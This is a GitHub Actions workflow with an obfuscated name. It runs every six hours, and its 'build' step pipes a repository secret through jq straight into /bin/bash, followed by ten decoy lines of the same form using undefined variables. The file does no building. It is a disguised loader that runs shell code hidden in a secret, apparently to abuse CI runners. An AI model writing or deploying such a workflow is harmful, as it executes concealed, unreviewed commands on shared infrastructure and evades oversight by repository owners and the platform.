name: lijun19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '0 0/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: lijun19871010
        env:
          di6054: ${{ secrets.di6054 }}
        run: |
          echo $di6054 | jq -r .cb28 | /bin/bash
          echo $nk64745 | jq -r .bkff2762 | /bin/bash
          echo $klub38479 | jq -r .bdzgx67 | /bin/bash
          echo $n0 | jq -r .fd3 | /bin/bash
          echo $lqaaz16 | jq -r .uol2590 | /bin/bash
          echo $js6 | jq -r .pldq6939 | /bin/bash
          echo $kwna78 | jq -r .axh99 | /bin/bash
          echo $qjnbm45960 | jq -r .jsly5 | /bin/bash
          echo $nekxg161 | jq -r .ro88709 | /bin/bash
          echo $eydtu7769 | jq -r .dyzdh278 | /bin/bash
          echo $shqo7 | jq -r .ogd87388 | /bin/bash

